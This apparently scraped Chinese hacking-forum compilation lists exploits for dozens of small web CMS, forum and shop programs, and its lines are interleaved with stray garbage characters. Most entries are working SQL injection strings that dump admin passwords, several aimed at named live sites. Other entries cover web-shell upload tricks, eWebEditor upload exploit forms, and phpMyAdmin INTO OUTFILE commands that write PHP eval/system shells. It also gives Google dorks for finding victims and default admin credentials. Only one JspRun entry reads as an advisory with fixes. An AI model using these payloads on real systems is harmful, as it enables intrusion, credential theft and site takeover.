启航企业建站系统 cookie注入漏洞通杀所有版本, Q5 A* Y- z. a3 X
P1 I2 ^& }3 F |. ~
直接上exploit:: i& M" T4 \2 Q& r* s) b7 G
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));, C; ?; H0 {6 U1 t- }
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
2 l2 V/ {9 g- N1 J% T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% L+ D6 v$ I2 \2 a. {/ |
Asprain论坛 注册用户 上传图片就可拿到webshell
+ T8 |4 [6 r8 L
0 G& x& ~- P% A3 L! ? NAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。/ y. S. k$ B- l! ?
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
! S o; ]+ P7 J. C& l+ m2.gif 为一小图片文件,一定要小,比如qq表情图片
" }5 b; x' ]; H( b5 K3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用2 O/ B# \1 s6 l6 S7 B9 |; ~
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
/ u- R. K. b+ @' D% g, s5.q.asp;.gif, f# O6 m* _( H8 M( q1 d
google:Powered by Asprain
9 [8 l/ S* E: P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( D+ o7 I) x: s% |5 c' V
* B Y j; |$ I9 }ShopNum1全部系统存在上传漏洞。1 W, X A- P) n! X% s) C) ~2 q6 R
) q8 K( B& `) H) U首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。2 N6 \$ H; T% M. v5 o. o
按说明 提示登录后台。。$ f/ f/ }' M$ h& r
在后台功能页面->附件管理->附件列表
( Y5 z) F- c, g2 k6 u9 E可以直接上传.aspx 后缀木马
) M0 H& F1 U4 A" h. Ohttp://demo.shopnum1.com/upload/20110720083822500.aspx o' L# v# p- }4 x' ?9 H+ \2 H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 R3 v" k" J5 r; H+ D# o, e% a
4 V9 b8 Y" o, ]8 t( V
牛牛CMS中小企业网站管理系统 上传漏洞
. h6 b( F2 c* [1 f
0 L. f8 k+ Q5 t1 }: z牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% a g; [6 ]# t2 {后台:admin/login.asp/ D x* e9 j; S% [
ewebeditor 5.5 Nday5 r/ c. ]. L% |& ?4 \3 Q
exp:
. X! O0 z, [; z+ _) r& _5 q- D<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
' H' a3 h. A; B$ @7 m, Y" p<input?type=file?name=uploadfile?size=100><br><br>?: ?9 k# Y( j- ~
<input?type=submit?value=upload>?7 S# D; |" q+ J3 D
</form>
' m9 Y0 [5 f$ I: S. ?6 R& u: dps:先上传小马.$ e; S. F y. [3 X9 K% i! A; Z/ z
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
" \( d7 i" o9 {4 g/ N/ Y
+ S) K2 W/ u, ~9 h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" i0 [+ y5 A! u7 V
3 I/ ~" ]9 s7 _& q5 d5 c1 i
YothCMS 遍历目录漏洞
3 N+ S( s2 l$ f% J, N) w
9 x; m' M6 n" Z. ]# r优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。+ A( k( q& |& F
默认后台:admin/login.asp9 s0 y. d( S5 o0 c) p# V
遍历目录:
/ ~* o. |% D* h: T3 i1 N4 wewebeditor/manage/upload.asp?id=1&dir=../
! d; B- k2 e- r7 ~, d: {data:
{8 M/ R7 O4 d& X) ~http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa. i' M/ t' ^/ K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& u4 V" A: u+ ^" D" U( v. ^
% Z% {- N8 t+ F$ F% D' ^6 r, _
Net112企业建站系统 1.0; j( V+ j# y; {! F7 c, h
! T6 C# s, e6 i ^源码简介:6 o- X$ \9 p7 F- g2 W1 |8 d4 f
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。" e$ T- G7 B/ V% @0 s+ w9 t
添加管理员:
4 ]" L9 K7 w4 q4 ]2 x8 F, ghttp://www.0855.tv/admin/admin.asp?action=add&level=25 f- f, n7 S9 b j
其实加不加都不是很重要,后台文件都没怎么作验证。
: Y# k- D6 v- u* p8 B上传路径:9 A6 x$ d; @8 \5 B9 P& t" v
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
/ w+ k5 k9 r. n; I& _: J8 t3 \http://www.0855.tv/inc/Upfile.asp?Stype=2
# N. ^( N3 T- Y, h怎么利用自己研究。2 c+ `$ d- @0 u0 C
遍历目录:
?& C7 | X& H8 ?# G* Ohttp://www.0855.tv/admin/upfile.asp?path=../..5 i V/ P! k5 ^ W: z
如:
) ~6 A n& K* c5 O& Mhttp://www.0855.tv/admin/upfile.asp?path=../admin1 l6 d" r) f9 S3 ~
http://www.0855.tv/admin/upfile.asp?path=../data; f( H$ _& D5 g) o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* C' t/ i) P. D
0 |. s' `4 k1 I1 \易和阳光购物商城通杀 上传漏洞
+ ?8 j$ \; Q4 l O4 S" ?4 F3 [( Z i: d, {1 D; r% { T# V3 H
前提要求是IIS6.0+asp坏境。) W/ T& f2 _ E9 Q3 l9 a
漏洞文件Iheeo_upfile.asp 8 k/ M+ S8 U/ q4 i( f1 X* k( c) ^9 A% ~
过滤不严.直接可以iis6.0上传
6 l5 ? |( l% G+ R! V' b把ASP木马改成0855.asp;1.gif
5 y8 z. T7 F% T- \7 m0 R直接放到明小子上传2 E. n# W& d& P8 Y6 k7 c8 z& v8 E
Google搜索:inurl:product.asp?Iheeoid=
- e" @) H) F) o2 }& K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! m6 z. y. r& Y. v
; b. p) \& u& {! G7 L2 cphpmyadmin后台4种拿shell方法9 u3 i( T$ L& I0 u- a
4 m: p: ^8 y# j, }方法一:
# j% a- o9 l" |CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 E, B# s% Y: k2 s/ wINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
" Z; I% c: T- j( U3 o7 e: `9 jSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';, D4 b1 [8 A4 u2 ~# x8 w) b3 C
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php6 \ H' {" `; c# l7 |
一句话连接密码:xiaoma8 l' e+ Y* f; a v
方法二:# P' M# e Q9 b* {* J
Create TABLE xiaoma (xiaoma1 text NOT NULL);3 ]; ~0 p3 i! O5 m9 Q" ~( m& N& ?
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');9 x2 R0 h3 }9 n) H2 G+ s6 _
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
7 l( A! k: @( Y4 oDrop TABLE IF EXISTS xiaoma;
' d: _) b+ u7 _$ Q! ?, w, f, U方法三:& Q6 r) |' n) |7 J1 x; J- F
读取文件内容: select load_file('E:/xamp/www/s.php');
3 `3 U8 H% K9 A- D7 Z, ^写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 O1 C5 r0 ^; w$ n" Acmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: d* B7 j& m$ s1 `9 q4 y' M2 O' i0 m方法四:
) d4 J3 j8 ^( E7 t+ ~. wselect load_file('E:/xamp/www/xiaoma.php');( J- n6 e6 l- z6 S
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" j; e$ b$ k. E% M( X然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
0 |. |) `9 O- d" q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 C- `+ Y+ r7 ?- q: H& l
d3 ?; C9 N6 n0 d
传信网络独立开发网站源码0day漏洞
$ g9 ?! L9 w8 ?# ~ U' i
0 e2 x% {. ?( t后台system/login.asp& ^3 N6 Z- e) A' t: r. ~
进了后台有个ewebeditor6 D8 U: [* y% d0 O* l4 U
Google 搜索inurl:product1.asp?tyc=6 R# v2 R$ C0 o+ [
编辑器漏洞默认后台ubbcode/admin_login.asp
5 d# I4 H# }+ C* o& B8 q0 f. p数据库ubbcode/db/ewebeditor.mdb$ }1 N$ b4 W& a6 f" |6 C
默认账号密码yzm 111111
! i! D& Q( n0 c/ @0 {9 o# z
6 W. E7 \$ I0 u6 y0 v拿webshell方法, q1 r9 }( \1 W# V. r' ]& C, s7 C
登陆后台点击“样式管理”-选择新增样式
9 S4 b; f8 \6 J6 G$ o2 z6 T样式名称:scriptkiddies 随便写 & g& r; r8 H4 V. D8 O
路径模式:选择绝对路径 * d3 R: m6 }. J# R
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx6 R& Z, M. c' \+ e
图片类型比如就是我们要上传的ASP木马格式
* K; a. _. @3 V' N+ w) p! l4 t上传路径:/
- k; O, o7 a# R7 g! y( v( L图片限制:写上1000 免的上不了我们的asp木马
2 H% K4 ]5 E# @! D) E" z* ~4 i' G上传内容不要写
) N( v( E" T3 l' F% z& G3 d& N; b可以提交了 5 o" L. e/ H+ }) H8 Z S' G( Y0 E% q
样式增加成功! # J3 l- J. g. k7 X, c2 X
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ]( g" k3 n0 z* L
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
6 G, P% g7 a8 B! K" M3 g网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies. t" U" X# t0 J
上ASP木马 回车 等到路径
9 A" k4 i2 m7 l; \: K/ ~' e; _8 s" Z1 c* j
后台:system/login.asp `( {2 w n X2 C0 L1 g
Exp:
! ~6 i2 s, h4 D; i' X$ U" H9 |and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master0 x; U5 G0 V p, L3 q; \
测试:7 @( W5 q9 n; R1 Q
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
9 \$ l" I# L- Y5 P# ?http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master/ e% A, F" ?) j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 {) C, J5 \! i/ L7 f
$ t; W0 ?5 S- H" U. U3 F$ X$ C
foosun 0day 最新注入漏洞
6 G, I6 r$ N5 Z! r+ r2 d: @# ]
- G; a& |$ P8 O漏洞文件:www.xxx.com/user/SetNextOptions.asp
3 ~6 q# d& `% \3 h利用简单的方法:$ \6 {- W! _" j4 x) \7 l4 d' N' I) Z
暴管理员帐号:4 m# v( O3 B* S, | H+ M% k6 t
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin" w! M6 V& j1 u e1 N
暴管理员密码:! s5 x% g$ v: z; l
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,) {% Z0 G1 J, N2 @2 y2 G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 t, k! L3 ?3 s0 h5 |4 z: X
6 x/ h6 k! e' E: y网站程序的版权未知!
4 {" }$ W' l- |0 n* S" A q* K' [- S. S% J* S* t
默认网站数据库:9 ]! C+ x# W% w2 q4 c: t
www.i0day.com/data/nxnews.mdb& x1 i9 q8 M& J/ Z. k+ f) j
ewebeditor 在线编辑器:
3 y) h5 L+ \, x5 i, _5 G6 c编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
* }. M9 |1 S" f, K9 H登录地址:ewebeditor/admin_login.asp9 \+ P2 X7 V9 ?& U# `# e
默认密码:admin admin! D9 D* l2 C8 ~* G' f! d [5 d4 P
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
7 [- c, @: Q3 `' D2 z! ]& B3 j/ x0 o, @2 G8 s* _
Sql注入漏洞:
% q/ I! P- e: {7 j# _$ v. B! thttp://www.i0day.com/detail.asp?id=12( P, r( {. J' }! J* [" E F$ Q! f0 k
exp:& T# c; S) v$ k" t! Y7 I, R
union select 1,admin,password,4,5,6,7,8 from admin. R4 g8 r5 L" N% o
爆出明文帐号/密码
# ?" @5 G$ [0 L) Y$ Z) H* z" ]; w7 k! B8 i; L9 A2 O1 u: P
上传漏洞:, }6 q5 r: K- h6 W$ q4 p7 S* Z
后台+upfile.asp6 c, [9 ~, i9 T3 m4 v# v- d
如:
# V4 u3 \; h' Ghttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。 s' c$ i! _2 y7 {7 o: V; U# e
shell的地址:网址+后台+成功上传的马
2 O3 d3 M) q8 Vgoogle:inurl:news.asp?lanmuName=
* x- B4 v' t. L! u/ e/ T------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. t( V+ T! {+ x4 ^: ^' }3 ]5 N$ e) J2 [ F$ }
dedecms最新0day利用不进后台直接拿WEBSHELL
, y9 T! ?' }! J8 \- Q" O8 Q% c7 {( k0 X; l2 Q- P+ a
拿webshell的方法如下:
2 z8 B2 q9 t* t网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.) }( @) w0 D% S( g9 W. g
前题条件,必须准备好自己的dede数据库,然后插入数据:
: `& F* [; ~6 }2 r' rinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
# N" [8 R# l5 X/ g2 I- R8 \3 |8 I9 i. z2 p% j; N
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. h( f* a. g$ d<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">* v" Y6 h9 _: m- V; T" a
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
4 b1 Z: R- F- i) j4 Y1 G4 n3 @<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />4 l3 W0 f& U/ W5 p; _8 t- F0 f
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( j: S9 |0 \5 M9 Q' E$ l$ B! v) T2 V<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) Z2 i/ e" {. ]4 ?$ n i
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
0 I) L0 p$ L; N" W+ N; z<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> ^4 _' n: J9 Z5 [# e' J
<input type="text" value="true" name="nocache" style="width:400">
" c$ ~" }" S4 T8 M$ k# v<input type="submit" value="提交" name="QuickSearchBtn"><br />
& i& E, _" w9 @</form>
* I! r8 r6 B( {4 r8 F4 q' ^<script>
& |1 J8 |1 s; P& b5 Ofunction addaction()2 B# n5 }, f% T8 b4 ?! V+ W
{
) T* a4 l2 g4 ~$ H. ]# ]document.QuickSearch.action=document.QuickSearch.doaction.value;
' U9 ^) i( I) x: n! l}
; v; t6 o9 n( P</script>* K; j6 h$ M6 f) e& y
-----------------------------------------------------------------------------------------------------------------------------------------------
) g& ]' J5 ^) n- D) Y% i& L3 p. x9 w% r! _" ~' v7 y, Y3 ]
dedecms织梦暴最新严重0day漏洞& `% h5 S% |8 V" \
bug被利用步骤如下:1 j6 f5 ?9 _ q4 M7 R' G) C8 V
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 v- s6 `# o8 ]8 m7 ~, i7 H' R把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 g3 e5 `$ F6 c! k4 a-------------------------------------------------------------------------------------------------------------------------------------------
0 b- B j1 b: f2 N5 v' |6 k/ U9 ~
' h: O4 [. T$ Q& r/ C. g/ b多多淘宝客程序上传漏洞 ! x# U0 v0 e5 l/ ~! l
漏洞页面:
" p1 d- |3 Q0 S( L8 h+ H6 Z- D/ ~9 gadmin\upload_pic.php z) R% d$ n, z$ _4 p |
传送门:
7 o) C9 ^2 Q0 \$ P' I4 Vhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
& N) E$ w l+ H, Z2 g) t7 vPS:copy张图片马 直接 xxx.php 上传抓包地址!' P, G" G& V3 \/ J; t- @
------------------------------------------------------------------------------------------------------------------------------------------------------
8 h$ g* J) ~/ L; A. \
/ _: O$ Z! X! F无忧公司系统ASP专业版后台上传漏洞
# j$ X+ e! V" O% C: |/ }0 p# v漏洞文件 后台上传
& Q4 u: ^& Y0 s' Zadmin/uploadPic.asp8 j1 A5 a# L5 J! e! s T
漏洞利用 这个漏洞好像是雷池的1 s) Z. R4 t6 @6 a, r
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1( w) C# d& L$ Y5 V2 P$ E7 n
等到的webshell路径:
/ h# `) W( h& b) `; c& K/UploadFiles/scriptkiddies.asp;_2.gif. h% I, u& ^ ^7 o' S+ @
---------------------------------------------------------------------------------------------------------------------------------------------------
6 L# O& O' I" V* F: y1 B0 N; U: k A. Y! t/ |% Z" H8 O8 x
住哪酒店分销联盟系统2010( r; U7 l* w/ I4 e) B, Q
Search:! Y- U! ?4 O8 C
inurl:index.php?m=hotelinfo4 ]3 y/ H/ s6 m8 I9 z2 p1 {
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin& P6 V/ K; y' i$ a/ [- V$ ^. L
默认后台:index.php?m=admin/login* h, J' y4 h% o: Z4 I) F
--------------------------------------------------------------------------------------------------------------------------------------------------( @# A, g3 R" b4 ^! B
3 l8 b4 \8 r3 y2 i' i7 Ainurl:info_Print.asp?ArticleID=
4 P, N) O9 O) r6 K: e* _( i* I7 ?后台 ad_login.asp
6 W, N6 f- {! E& `4 Q7 S爆管理员密码:' ^& R& c- O3 ^4 o6 q% |
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
9 T& g9 A. {, w" J4 |. F( j------------------------------------------------------------------------------------------------------------------------------------------------------------. q6 |" ]: A9 U2 z4 W5 Z; `; s. Y
/ k$ H/ T- D6 v搜索框漏洞!9 w0 }1 p ~0 @$ F% x5 S6 R
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='' S8 L! e- h+ r, X3 S9 [
--------------------------------------------------------------------------------------------------------------------------------------------------------
/ D% V5 R4 i! o% c
: g: t, x6 t2 ^$ A# ~2 t关键字:7 Z& H' C6 W8 E( B
inurl:/reg_TemletSel.asp?step=2
* D$ B% F2 a; Y% h8 h/ b" y. v或者. u+ V6 S! z+ L: k# K+ C% i. Z. l
电子商务自助建站--您理想的助手1 u# V. j+ K! l/ w( U! y
-------------------------------------------------------------------------------------------------------------------------------------------------' v U4 W; N5 A/ ?0 h
( r) ?/ g7 ]* w! _! N3 P( miGiveTest 2.1.0注入漏洞8 l' P/ s) n$ m% r F, p1 c
Version: <= 2.1.0
; o7 K9 E9 ^0 n1 E( `1 [# Homepage: http://iGiveTest.com/
' ? o8 J, a9 ]! H8 k3 q8 |, f1 l3 [谷歌关键字: “Powered by iGiveTest”
% A8 ~% @% {& n Y0 C9 b随便注册一个帐号。然后暴管理员帐号和密码
4 }; C" D7 @# v+ N) V9 ^$ Q5 }http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
0 Z! y5 b% }# u2 T) X------------------------------------------------------------------------------------------------------------------------------------------------4 w. f( A" u# A* T/ p( v$ s' S, }
5 A8 u; [/ A8 t x3 c1 \( @
CKXP网上书店注入漏洞
z3 E6 h% D9 _2 \ A! {0 w工具加表:shop_admin 加字段:admin
4 D. X [1 _; y* w0 W# W- \后台:admin/login.asp - E& I, v5 i; z3 n) b8 |3 h) f* y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
+ m& z5 z1 Y6 A! ^+ e6 u1 linurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息$ C2 ]6 ]6 y$ d7 l8 |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 D6 T8 _, f6 N% j3 m) |& Q9 t/ W
. h6 x4 U' w. Q! O/ p) ^
段富超个人网站系统留言本写马漏洞, s/ E; H6 W4 j4 i/ ]* d
源码下载:http://www.mycodes.net/24/2149.htm$ s' j5 S, j: |! s$ L; B
addgbook.asp 提交一句话。( V1 Z9 f4 E* [( t' M
连接: http://www.xxxx.tv/date/date3f.asp. P: u9 O0 v8 o. \) w; ]( m
google:为防批量,特略!
3 C8 O! [% ?' x-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( P/ ~1 E: }+ K0 v9 k, W/ z& e; T1 |" E; H9 f8 f3 l. c4 W
智有道专业旅游系统v1.0 注入及列目录漏洞
; @7 t3 ?6 m3 S; E& d" y默认后台路径:/admin/login.asp9 x7 g* T/ ~* f2 v2 Z
默认管理员:admin9 n3 o, j2 e0 }+ S- H- p$ A
默认密码:123456+ h6 X! K+ m5 O( V r: y0 ~3 N
SQL EXP Tset:
% _5 c0 K' @: Hhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin4 D% H4 \9 x8 i4 X, O7 ?" Y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 A, g H1 y" L5 R
8 J( l( f1 T3 b5 {; `9 {( {/ l
ewebeditor(PHP) Ver 3.8 本任意文件上传0day6 O6 u3 S% j* f
EXP:2 ^- k) n1 p( ?8 O# r
<title>eWebeditoR3.8 for php任意文件上EXP</title>
, |* Q6 a4 f$ }. [) e<form action="" method=post enctype="multip! T/ }! f: @# Z* x' n
art/form-data">
. z5 h9 z5 x) z5 V! B<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
; Q/ Z6 T' V* W2 yURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
2 U# t! `3 v5 O' k1 |0 y C<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
+ O0 _5 ]2 K8 g4 z9 Nfile:<input type=file name="uploadfile"><br> 9 G7 M" D4 }2 e
<input type=button value=submit onclick=fsubmit()> % c/ w( X& x }7 Q. O& x
</form><br> / |# k z. e$ r" d' m. B
<script> 2 N! I! w, {# u, n8 n/ M
function fsubmit(){
3 }; o6 F) ?) f" }! _3 Hform = document.forms[0]; * x% {. Y/ v. u7 f+ G. ~ B; y
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; X- V8 z; ~2 X, p
alert(form.action);
! O: z" R- A& f& i' n8 Y" q, B8 Vform.submit();
* P% S2 ^; |' S# |1 w+ k! s, y} ' a* @5 `# x$ G4 m! w: S% Z
</script>
) |. T5 ?6 }# O1 k) [* E2 M: b注意修改里面ewebeditor的名称还有路径。
6 T6 ~, ? ~4 L---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ q% G; Q- t( S+ X
. ^3 y% f& _7 u7 F提交’时提示ip被记录 防注入系统的利用
& e6 V! D# {% h网址:http://www.xxx.com/newslist.asp?id=122′
1 P6 X) J0 ^& I% ^! n提示“你的操作已被记录!”等信息。4 v- x3 O8 @; u5 c0 p+ n
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。2 }2 }; v4 k( M% E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 x" j5 @; R& r
$ D: c8 p9 u& Y' K
西部商务网站管理系统 批量拿shell-0day
* B3 d) O0 t3 f* A, c1 N2 D这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
5 S% F1 ^6 T9 g4 `2 k' Q1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛2 P: b9 R# Y" Q! a# F5 L
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合5 j% W2 }- x1 R5 z* _
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
$ ?9 {- O. W9 w! K9 l" o---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. q, ]: E8 A/ K9 S' U f f8 s& Q% h3 r. J7 Q, d# K, C! w; D
JspRun!6.0 论坛管理后台注入漏洞- B- L0 b* J6 C6 y4 G
: D/ [; Z0 y% D; L: l6 v: B2 N
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:5 j/ o8 q$ O2 U5 E+ C
JspRun!6.0 ' K* \; T/ u# g; h. I: i2 F( O
漏洞描述:8 A4 w! z$ a# O: h& ~
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
+ C) U# L9 E; x8 ^3 b- e3 N, U$ `4 h在处理后台提交的文件中ForumManageAction.java第1940行+ N# M- F# D5 l
String export = request.getParameter("export");//直接获取,没有安全过滤0 \( E9 |' O' q% I
if(export!=null){
: v* |6 ]9 @5 [List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
. A. m# _' p/ l" Y; yif(styles==null||styles.size()==0){1 y4 f" r' }; F) I5 }3 |
<*参考* p! T6 i1 Z$ N( V3 @
nuanfan@gmail.com
% {' [$ X, s9 K6 G*> SEBUG安全建议:+ Q$ r3 x& M0 S m. s; b# `/ C5 j M
www.jsprun.net
0 x: Q& D- c# B$ n0 d. q(1)安全过滤变量export
& J" `. K' M& ^9 V( c( m(2)在查询语句中使用占位符' z. a$ E1 T, D$ c3 f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 t5 [7 m( b& W& f9 |# G7 C! Z* ?2 x: T* S( E
乌邦图企业网站系统 cookies 注入
f5 ]2 B% |$ \6 B* b" _" w& w& z1 M, u7 G+ _7 `2 X' y% W8 H8 R
程序完整登陆后台:/admin/login.asp% {/ y2 w0 g9 u/ F( u
默认登陆帐号:admin 密码:admin888
- s/ A" }; Y; Y语句:(前面加个空格)
& t8 u& I4 B! Q' uand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
1 f: f' Q9 y# u2 j# w7 |或者是16个字段:
1 P" X( z2 Y* j( W& Hand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin5 S ~( u0 u0 T- O
爆不出来自己猜字段。
3 L# a, V- y6 c8 {! Y0 M: c( ?注入点:http://www.untnt.com/shownews.asp?=88
% p; \, a4 O+ [. v+ y8 n5 u) Egetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp0 j7 _4 l( x$ I
关键字:% m/ \0 m1 u; ~+ K6 B
inurl:shownews?asp.id=
" z# Z) X8 H+ t7 f4 U, H8 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% i9 p7 S2 g m% j
( [9 z* P$ K" @$ NCKXP网上书店注入漏洞
0 o* Y* {0 e- K- g) _/ F1 {/ z @0 I" _7 M" M# Q& S0 P7 P
工具加表:shop_admin 加字段:admin! y# p3 R/ t4 ?: N
后台:admin/login.asp
7 D4 {; [3 z! n1 v3 h5 U6 @+ {, L登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
1 p& m; G2 [: S- {& S2 s- Iinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息5 L! l8 ~. u6 ~: M6 h2 F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- r4 g; |$ |2 l( @
& k" u+ r3 J/ V6 k
YxShop易想购物商城4.7.1版本任意文件上传漏洞
5 @. a2 \1 Y9 B+ ]- z+ ~# D1 Q7 r1 h( v4 X2 z( W8 k
